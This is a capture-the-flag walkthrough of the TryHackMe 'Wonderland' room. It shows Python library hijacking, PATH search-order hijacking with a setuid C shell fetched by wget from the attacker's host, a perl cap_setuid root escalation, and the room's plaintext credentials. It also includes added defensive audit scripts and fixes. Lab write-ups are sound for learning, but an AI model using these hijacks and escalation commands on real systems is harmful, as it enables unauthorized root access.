THM - Wonderland
Linux | Python Library Hijacking | Search Order Hijacking | Lateral Movement | Capabilities
Techniques For This Room
Python Library Hijacking - Python searches for a module in directories following a specific order of priority. Inserting a malicious module earlier in the order results in it being prioritised and triggered. (Detailed explanation)
Search Order Hijacking - This involves forcing a system to run a malicious program instead of the intended one. This is done by placing the malicious program in a path which will be searched before the path of the intended program. (Detailed explanation)
Excellent Walkthrough - I used this walkthrough by Alexis Rodriguez which is very helpful
TL;DR / Executive Summary
Scan and enumerate with nmap and gobuster
Gain foothold by SSH-ing in and moving laterally across users
Privesc through capabilities
Scanning & Enumeration
Let's start with the usual nmap and gobuster scans
Nmap
nmap -sV -sC -vv <IP>
The following ports are open to us: 22 (SSH) and 80 (HTTP).

Checking out port 80 reveals this page:

Interesting. Looks like we'll have to...

gobuster
gobuster dir -u http://<IP> -w <wordlist>
We find an interesting directory called "/r":

Checking out directory "/r" gives us this page:

Considering we've been told to follow the white rabbit, and gobuster provided a directory named "/r", we can deduce that we should check out the following address <IP>/r/a/b/b/i/t.
That brings us to this page:

There's not much on the page itself, but checking out the page source gives us potential credentials!

Gaining Foothold
Let's try these credentials "alice:HowDothTheLittleCrocodileImproveHisShiningTail" with SSH.
ssh alice@<IP> -p 22
It works and we're in!

Checking out alice's files shows the root.txt, but we're unable to interact with it. However, the walrus_and_the_carpenter.py file looks interesting.

Another quick privesc check is to see what commands we are allowed to run using "sudo -l".

We see that we're able to run the Python file from earlier, but as user rabbit. All roads seem to lead to the Python file, so let's head over there.
Running it with python3 prints some lines from the poem.

Looking into the Python file itself shows us that it is designed to display a random paragraph.

Let's delve deeper into how this occurs. When this Python file is run, the random module is imported and used to pick the paragraph that is printed. When Python needs to import a module, it searches a set sequence of directories for the requested module, and the first directory will be the current directory. This means that if we create a malicious Python module called random in our current directory, our module will be imported instead of the real one. This is called Python Library Hijacking, and more information on it can be found here.
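To see the search order decide which random.py wins, here is an added example (mine, not code from the room or from the walkthrough) that resolves a module name under a given search path and lists the entries the current user could write a module into; the stand-in module it creates is empty and is removed afterwards.

```python
# Added example (not from the room or the walkthrough): resolves which file
# Python would load for a module name under a given search order, and lists
# the search-path entries the current user could drop a module into.
import os
import sys
import tempfile
from importlib.machinery import PathFinder


def module_origin(name, search_path):
    """File Python would load for `name` when searching `search_path` in order,
    or None. PathFinder is queried directly so a copy already cached in
    sys.modules (tempfile itself imports random) does not mask the result."""
    spec = PathFinder.find_spec(name, search_path)
    return None if spec is None else spec.origin


def writable_entries(search_path):
    """Entries an unprivileged user could plant a module in: '' (the current
    directory) and any directory writable by the current process."""
    return [e for e in search_path if e == "" or os.access(e, os.W_OK)]


def demo_shadowing(name="random"):
    """Constructed demo: a harmless stand-in module named `name`, placed in a
    directory that precedes the standard library in the search order, is the
    one Python would import. Returns (stdlib_origin, shadowed_origin, dir)."""
    stdlib_origin = module_origin(name, sys.path)
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, name + ".py"), "w") as fh:
            fh.write("# stand-in created by the demo; it does nothing\n")
        # sys.path[0] is the running script's directory (the cwd for an
        # interactive session), which is why a random.py beside the script
        # wins over the copy under /usr/lib/python3.*/.
        shadowed_origin = module_origin(name, [tmp] + sys.path)
    return stdlib_origin, shadowed_origin, tmp


if __name__ == "__main__":
    before, after, where = demo_shadowing()
    print("standard library copy :", before)
    print("copy that would load  :", after, "(from", where + ")")
    print("writable sys.path dirs:", writable_entries(sys.path))
```

On Python 3.11 and later, running a script with python3 -P (or with PYTHONSAFEPATH set) leaves the script's directory off sys.path, which removes this particular shadowing opportunity.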
Now that we understand the process, let's create our random.py module.
nano random.py
In this module, we'll get it to open /bin/bash.
import os
os.system("/bin/bash")
Once that's done, let's run this as user rabbit.
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
We've successfully moved laterally into user rabbit:

Now we'll try to get the user.txt flag. Admittedly, this will require some trial-and-error with witty interpretation of the hint provided. We see that the root.txt is in the user directory, when it usually is in the root directory. Also, the hint says that "everything is upside down here". We can guess that the user.txt could be in the root directory. Although we're unable to list the files in it, we can read the user.txt:

Now let's see how we can escalate our privileges. After some exploration, we find a file called teaParty highlighted in red.

We're unable to interact much with the file, but we can see what type of file teaParty is by using the "file" command.

As we can see, it's an ELF (Executable and Linkable Format) binary, which means we can execute it. Doing so shows us the following message:

An interesting point to note from the output is that the date and time printed are almost current. This could mean that there's a script pulling the date and time upon file execution. If we can have a peek inside the file, we may see if this is true:

Based on the section "&& date --date='next hour'", we can confirm this: date is called by name rather than by its full path. In a similar vein to Python Library Hijacking, we can use Search Order Hijacking to run our own "date" command instead of the real date command. More information on Search Order Hijacking can be found here.
Let's create our "date" command:
nano date
Similar to earlier, we'll get it to open /bin/bash:
#!/bin/bash
/bin/bash
Now to grant it the necessary permissions:
chmod +x date
Lastly, we need to place our newly created "date" command in the PATH variable, so that it is run:
export PATH=/home/rabbit:$PATH
Alternative:
We can also create the malicious "date" command in C on our attacking machine:
#include <unistd.h>

int main(void)
{
    setuid(0);                                   /* become uid 0 (only works if the caller is privileged) */
    execl("/bin/bash", "bash", (char *)NULL);    /* replace this process with a shell */
    return 0;
}
Save it as setuid.c and compile it with gcc using this command:
gcc setuid.c -o date
Now, from the victim machine, fetch the compiled "date" file from our attacking machine:
wget <yourIP>:<yourport>/date
Grant it the necessary permissions:
chmod +x date
Place our "date" first in the PATH to ensure it runs before the default one:
export PATH=.:${PATH}
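As an added example (mine, not code from the room or from the walkthrough), the following audit answers the question teaParty's bare date call raises: which file does a name resolve to under a given PATH, and could a lower-privileged user have placed a file earlier in the search order? The "system" and user directories and the stand-in date scripts it uses are constructed in temporary locations.

```python
# Added example (not from the room or the walkthrough): audits a PATH value
# the way a reviewer of teaParty's bare `date` call would: which file does
# the name resolve to, and could a lower-privileged user have planted a
# file earlier in the search order?
import os
import shutil
import stat
import tempfile


def path_entries(path_value):
    """Split a PATH string; an empty entry means the current directory."""
    return path_value.split(os.pathsep)


def hijackable_entries(path_value):
    """Entries a non-root user could plant a binary in: '' and '.', any other
    relative entry, and any directory writable by the current process."""
    return [e for e in path_entries(path_value)
            if e in ("", ".") or not os.path.isabs(e) or os.access(e, os.W_OK)]


def audit(name, path_value):
    """Return (resolved_file, exposed). `resolved_file` is what a shell would
    run for `name` under this PATH; `exposed` lists the hijackable entries
    searched up to and including the one that resolved the name."""
    resolved = shutil.which(name, path=path_value)
    risky = set(hijackable_entries(path_value))
    exposed = []
    for entry in path_entries(path_value):
        if entry in risky:
            exposed.append(entry)
        if resolved is not None and os.path.dirname(resolved) == entry:
            break
    return resolved, exposed


def _make_script(path, body="#!/bin/sh\necho constructed\n"):
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, stat.S_IRWXU)


def demo():
    """Constructed demo mirroring the room: a 'system' directory holding the
    intended date and a user-writable directory holding a stand-in, with the
    user directory then prepended to PATH as the walkthrough does."""
    with tempfile.TemporaryDirectory() as sys_dir, \
            tempfile.TemporaryDirectory() as user_dir:
        _make_script(os.path.join(sys_dir, "date"))
        _make_script(os.path.join(user_dir, "date"))
        intended = audit("date", sys_dir)
        hijacked = audit("date", user_dir + os.pathsep + sys_dir)
    return intended, hijacked, sys_dir, user_dir
```

The fix on the program side is to call /bin/date by absolute path, or to reset PATH to a known value before handing a command line to the shell.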
Now let's run the ELF file using "./teaParty". We have moved laterally again, and are now hatter!

Privilege Escalation
Let's explore and see what we find as hatter. We find a file called password.txt:

Looks like hatter's password is "WhyIsARavenLikeAWritingDesk?". Although we've moved laterally into hatter's account, we are still running with rabbit's group ID and group privileges. This may hinder our efforts to escalate to root.

So let's log out and SSH back in with hatter's password:
ssh hatter@<IP> -p 22
Now that we have hatter's privileges, let's search for ways to privesc.

We run the usual privesc checks, but nothing works. Let's try one of the less common ones, which involves exploiting capabilities. We can list them with this command:
getcap -r / 2>/dev/null
Some of the binaries to look out for in the capabilities output are tar, perl, and python3. Here we see 3 results:

Running a quick "ls -la" on the 3 options shows us whether hatter has sufficient privileges to run them. Looks like we can run perl.

Time to check in with our trusty GTFOBins on how to abuse this capability. We find that the following command can be used:
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
That worked! We are now root.
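The getcap and "ls -la" steps above can be folded into one audit. The following is an added example (mine, not code from the room or from the walkthrough) that parses getcap output and pairs it with each file's mode; the sample listing and modes are constructed, not the room's real output.

```python
# Added example (not from the room or the walkthrough): parses `getcap -r /`
# output and, with each file's mode, reports binaries that combine an
# identity-changing capability with execute access beyond the owner.
import re
import stat

# Capabilities that are as good as setuid-root on an interpreter (perl,
# python3) or archiver (tar) that unprivileged users may run.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_admin"}
# getcap has printed both "path = caps+ep" and "path caps=ep" over the years.
_LINE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>\S+)$")


def parse_getcap_line(line):
    """(path, set of capability names) from one getcap line, or None."""
    m = _LINE.match(line.strip())
    if m is None:
        return None
    names = re.split(r"[+=]", m.group("caps"), maxsplit=1)[0]
    return m.group("path"), {c.lower() for c in names.split(",") if c}


def who_can_execute(mode):
    """Widest class of users the execute bits of `mode` admit."""
    if mode & stat.S_IXOTH:
        return "everyone"
    if mode & stat.S_IXGRP:
        return "group"
    return "owner" if mode & stat.S_IXUSR else "nobody"


def audit(getcap_lines, modes):
    """modes maps path -> st_mode (os.stat(path).st_mode on a live host).
    Returns (path, dangerous caps, who may execute) for each risky file."""
    findings = []
    for line in getcap_lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        bad = caps & DANGEROUS
        who = who_can_execute(modes.get(path, 0))
        if bad and who in ("everyone", "group"):
            findings.append((path, sorted(bad), who))
    return findings


# Constructed sample, not the room's real listing; one line per output style.
SAMPLE_GETCAP = ["/usr/bin/perl = cap_setuid+ep",
                 "/usr/bin/python3.6 cap_setuid=ep",
                 "/usr/bin/tar cap_net_bind_service=ep"]
SAMPLE_MODES = {"/usr/bin/perl": 0o100755, "/usr/bin/python3.6": 0o100700,
                "/usr/bin/tar": 0o100755}
```

On a real host the modes come from os.stat on each path in the getcap output; a finding here means any user in the listed class gets the capability simply by running the file.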

And here's our root flag:
